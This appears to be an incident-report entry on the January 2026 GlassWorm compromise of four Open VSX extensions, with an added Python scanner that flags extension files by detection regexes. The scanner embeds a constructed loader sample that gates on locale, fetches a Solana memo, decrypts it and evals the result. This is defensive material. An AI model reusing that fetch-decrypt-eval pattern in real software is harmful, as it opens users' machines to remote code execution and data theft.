
Cyber Incident Victim: Open VSX

Date:

Jan 2026

Location:

Canada

Summary

A threat actor compromised a publisher account on the Open VSX marketplace and pushed malicious updates to four established VS Code extensions with a combined download count of more than 22,000. The poisoned extensions carry a GlassWorm loader that executes at runtime, exits on systems with a Russian locale, and reads its command-and-control data from memo fields of Solana transactions before executing additional code. On macOS the loader profiles the host, uses the C2 data from the memo to fetch a second-stage Node.js implant, and steals browser cookies, history, login files and wallet data, the macOS keychain, Apple Notes, FortiClient VPN information, and documents from the Desktop, Documents and Downloads folders. It focuses on developer credentials such as AWS and SSH material, which can be reused for further compromise.


Description

On January 30, 2026, a threat actor compromised an established publisher account on the Open VSX marketplace and uploaded malicious updates to four widely used Visual Studio Code extensions that together had accumulated more than 22,000 downloads. The account had a history of publishing multiple extensions and strong adoption signals across ecosystems, so the attacker sidestepped defenses that look for typosquatted or cloned extensions: the updates arrived from a trusted publisher through the normal update channel. Open VSX security analysts attributed the poisoned updates to a fresh GlassWorm campaign and noted that no new publisher identities were created; the attack abused legitimate credentials. The extensions contained code that runs at extension load time, exits on systems with a Russian locale, and retrieves command-and-control instructions from memos embedded in Solana blockchain transactions.


Once executed on a macOS host, the loader hidden in each extension's extension.js file profiled the system and continued only if the operating system matched its target. A second-stage Node.js implant then harvested data from Firefox and Chromium-based browsers, including cookies, form history, login files and wallet-extension artifacts. It also collected Safari cookies, desktop cryptocurrency wallets, the macOS keychain, Apple Notes and FortiClient VPN data, and gathered documents from the Desktop, Documents and Downloads folders, staging everything for exfiltration to hardcoded external destinations. Socket researchers emphasized that the implant specifically sought developer credentials and configuration files, such as AWS and SSH keys, which raises the risk of cloud account compromise and lateral movement in the networks of affected developers.

The Open VSX security team assessed the breach as consistent with leaked publishing tokens or other unauthorized access to the compromised account: the attacker gained upload rights to an existing, trusted publisher rather than registering a new one. Their analysis framed the incident as an escalation of supply chain abuse on Open VSX, noting that the threat actor blended malicious activity into normal developer workflows, shipped loaders that are stored encrypted and decrypted only at runtime to hinder static inspection, and used Solana memos as a dynamic dead drop so that infrastructure could be rotated without republishing the extensions. No further details about remediation steps, takedown actions or user notifications were provided in the source material.
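The behaviours described in the two paragraphs above (a locale gate, a macOS-only platform gate, a Solana memo dead drop, and a loader that decrypts and executes code at runtime) are individually unremarkable but rarely appear together in a legitimate extension. The following triage script is an added example, not tooling from Open VSX, Socket or the GlassWorm analysis; the indicator regexes and the two embedded extension sources are constructed for illustration and are not published GlassWorm signatures. It scores each JavaScript file under the local extension directories by how many indicator families it hits, so a practitioner can shortlist extensions for manual review.

```python
"""Heuristic triage of installed VS Code / Open VSX extensions for the loader
pattern described above. Added example; not Open VSX, Socket or GlassWorm code."""
from __future__ import annotations

import re
from pathlib import Path

# Indicator families. These regexes are illustrative assumptions, not
# published signatures; tune them for your environment.
INDICATORS: dict[str, list[str]] = {
    "locale_check": [
        r"Intl\.DateTimeFormat\(\)\.resolvedOptions\(\)\.locale",
        r"process\.env\.(LANG|LC_ALL|LANGUAGE)",
        r"\bru[-_]RU\b",
    ],
    "solana_memo_c2": [
        r"getSignaturesForAddress",          # Solana RPC call that returns memos
        r"api\.mainnet-beta\.solana\.com",
        r"\bmemo\b",
    ],
    "runtime_decrypt_exec": [
        r"createDecipheriv\(",
        r"\beval\(",
        r"new Function\(",
        r"vm\.runInThisContext\(",
    ],
    "platform_gate": [
        r"process\.platform\s*[!=]==?\s*['\"]darwin['\"]",
        r"os\.platform\(\)",
    ],
}


def scan_source(src: str) -> dict[str, list[str]]:
    """Return {family: [patterns that matched]} for one JavaScript source."""
    hits: dict[str, list[str]] = {}
    for family, patterns in INDICATORS.items():
        matched = [p for p in patterns if re.search(p, src)]
        if matched:
            hits[family] = matched
    return hits


def classify(hits: dict[str, list[str]]) -> str:
    """A platform check alone is normal; the combination is the signal."""
    families = set(hits)
    if {"locale_check", "runtime_decrypt_exec"} <= families or len(families) >= 3:
        return "suspicious"
    if len(families) == 2:
        return "review"
    return "clean"


def scan_extension_dirs(roots: list[str]) -> list[tuple[str, str, dict[str, list[str]]]]:
    """Walk extension roots (assumed defaults: ~/.vscode/extensions for VS Code,
    ~/.vscode-oss/extensions for VSCodium) and report every .js file not 'clean'."""
    results = []
    for root in roots:
        base = Path(root).expanduser()
        if not base.is_dir():
            continue
        for js in base.rglob("*.js"):
            try:
                src = js.read_text(errors="ignore")
            except OSError:
                continue
            hits = scan_source(src)
            verdict = classify(hits)
            if verdict != "clean":
                results.append((str(js), verdict, hits))
    return results


# Constructed samples for offline demonstration; not real extension code.
BENIGN_SAMPLE = """
const os = require("os");
function activate(ctx) {
  if (process.platform === "darwin") { registerMacKeybindings(ctx); }
  console.log("running on", os.platform());
}
"""

SUSPICIOUS_SAMPLE = """
const crypto = require("crypto");
async function activate() {
  if (Intl.DateTimeFormat().resolvedOptions().locale.startsWith("ru")) return;
  if (process.platform !== "darwin") return;
  const sigs = await rpc("https://api.mainnet-beta.solana.com",
                         "getSignaturesForAddress", [DROP_WALLET]);
  const memo = sigs[0].memo;
  const d = crypto.createDecipheriv("aes-256-cbc", KEY, IV);
  eval(d.update(memo, "base64", "utf8") + d.final("utf8"));
}
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(f"{name}: {classify(scan_source(src))} {sorted(scan_source(src))}")
    for path, verdict, hits in scan_extension_dirs(
        ["~/.vscode/extensions", "~/.vscode-oss/extensions"]
    ):
        print(f"{verdict}: {path} {sorted(hits)}")
```

Treat the output as a shortlist, not a verdict: an extension flagged "review" may legitimately touch two of these families, while a "suspicious" hit warrants reading the file and checking the publisher's recent version history before the extension is trusted again.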
